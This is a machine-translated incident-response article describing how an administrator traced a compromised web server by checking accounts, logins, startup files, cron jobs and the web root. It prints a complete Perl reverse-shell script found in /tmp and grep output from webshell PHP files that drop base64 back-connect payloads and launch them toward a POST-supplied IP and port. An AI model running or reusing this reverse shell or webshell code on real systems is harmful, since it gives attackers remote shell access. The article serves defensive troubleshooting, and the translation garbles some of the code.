Shulou(Shulou.com)06/01 Report--

This article mainly introduces how to troubleshoot the virus in the Web server, the article is very detailed, has a certain reference value, interested friends must read it!

A server is suspected to be linked to a horse, the phenomenon is from Baidu search the site, the results are mostly × × website.

Log in to the server immediately (I'm sleepy in the middle of the night). Perform the following steps:

1. Check the system account to see if there are any abnormal accounts-such as impersonating a system account and changing a letter to look like a system account and confuse the public. Some guys work cunningly, creating an account called "…" Extremely imperceptible.

2. Check the ip:last of the recently logged-in user to see the situation since September 9. It has been confirmed that there is an ip coming from the wrong way.

3. Check the system initialization file inittab, run level 3, to find an exception. Some hacker like to do it here, plus a line like respawn to ensure that his program automatically restarts after it is killed, and fights relentlessly against the strangulation of the system administrator.

4. Check the script of the run-level directory, ls-al / etc/rc3.d, and no exception is found.

5. Check the automatic task crontab-l. The root user and the web user www each check once, and no exception is found.

6. Check the history of history and find that sendmail is installed. Ask the customer if they have this. Answer: it is not installed by yourself.

7. Check the web directory and find that its permission is 777, which is not very reassuring. I guess I may start from here.

8. Check the directory / tmp and find that there is something wrong with the file. The file name is spider_bc. Open it and have a look. It is a perl script with the following contents:

[root@localhost mysql] # more / tmp/spider_bc

#! / usr/bin/perl

Use Socket

$cmd= "lynx"

$system= 'echo "`uname-a`"; echo "`id`"; / bin/sh'

$0=$cmd

$target=$ARGV [0]

$port=$ARGV [1]

$iaddr=inet_aton ($target) | | die ("Error: $!\ n")

$paddr=sockaddr_in ($port, $iaddr) | | die ("Error: $!\ n")

$proto=getprotobyname ('tcp')

Socket (SOCKET, PF_INET, SOCK_STREAM, $proto) | | die ("Error: $!\ n")

Connect (SOCKET, $paddr) | | die ("Error: $!\ n")

Open (STDIN, "> & SOCKET")

Open (STDOUT, "> & SOCKET")

Open (STDERR, "> & SOCKET")

System ($system)

Close (STDIN)

Close (STDOUT)

Close (STDERR)

According to the response of the customer developer, after the file was deleted, it was automatically generated again.

9. It is initially suspected that after hacker uploaded the program using web permission settings and program vulnerabilities, the file was automatically generated, so it went to the root directory of the website, and then executed grep-r "spider" *. For a moment, the result came out. The following excerpt:

[root@localhost www] # grep spider_bc *-r

/ plusbak/viev. Php: echo File_Write ('/ tmp/spider_bc',base64_decode ($back_connect_pl), 'wb')? 'created / tmp/spider_bc successful

Failed to create / tmp/spider_bc

'

/ plusbak/viev. Php: echo Exec_Run ($perlpath.' / tmp/spider_bc'. $_ POST ['yourip'].'. $_ POST ['yourport'].' &')? 'nc-l-n-v-p'. $_ POST ['yourport']:' failed to execute command'

/ plusbak/viev. Php: echo File_Write ('/ tmp/spider_bc.c',base64_decode ($back_connect_c), 'wb')? 'created / tmp/spider_bc.c successful

Failed to create / tmp/spider_bc.c

'

/ plusbak/viev. Php: @ unlink ('/ tmp/spider_bc.c')

/ plusbak/viev. Php: echo Exec_Run ('/ tmp/spider_bc'. $_ POST ['yourip'].'. $_ POST ['yourport']. &')? 'nc-l-n-v-p'. $_ POST ['yourport']:' failed to execute command'

/ developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths. Php: echo File_Write ('/ tmp/spider_bc',base64_decode ($back_connect_pl), 'wb')? 'created / tmp/spider_bc successful

Failed to create / tmp/spider_bc

'

/ developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths. Php: echo Exec_Run ($perlpath.' / tmp/spider_bc'. $_ POST ['yourip'].'. $_ POST ['yourport'].' &')? 'nc-l-n-v-p'. $_ POST ['yourport']:' failed to execute command'

/ developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths. Php: echo File_Write ('/ tmp/spider_bc.c',base64_decode ($back_connect_c), 'wb')? 'created / tmp/spider_bc.c successful

Failed to create / tmp/spider_bc.c

'

/ developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths. Php: @ unlink ('/ tmp/spider_bc.c')

/ developers/FCKeditor/editor/skins/p_w_picpaths/p_w_picpaths. Php: echo Exec_Run ('/ tmp/spider_bc'. $_ POST ['yourip'].'. $_ POST ['yourport']. &')? 'nc-l-n-v-p'. $_ POST ['yourport']:' failed to execute command'

/ developers/developers/cache/default/index_sql. Php: echo File_Write ('/ tmp/spider_bc',base64_decode ($back_connect_pl), 'wb')? 'created / tmp/spider_bc successful

Failed to create / tmp/spider_bc

'

/ developers/developers/cache/default/index_sql. Php: echo Exec_Run ($perlpath.' / tmp/spider_bc'. $_ POST ['yourip'].'. $_ POST ['yourport'].' &')? 'nc-l-n-v-p'. $_ POST ['yourport']:' failed to execute command'

/ developers/developers/cache/default/index_sql. Php: echo File_Write ('/ tmp/spider_bc.c',base64_decode ($back_connect_c), 'wb')? 'created / tmp/spider_bc.c successful

Failed to create / tmp/spider_bc.c

'

/ developers/developers/cache/default/index_sql. Php: @ unlink ('/ tmp/spider_bc.c')

/ developers/developers/cache/default/index_sql. Php: echo Exec_Run ('/ tmp/spider_bc'. $_ POST ['yourip'].'. $_ POST ['yourport']. &')? 'nc-l-n-v-p'. $_ POST ['yourport']:' failed to execute command'

The above is all the contents of the article "how to troubleshoot viruses in Web servers". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.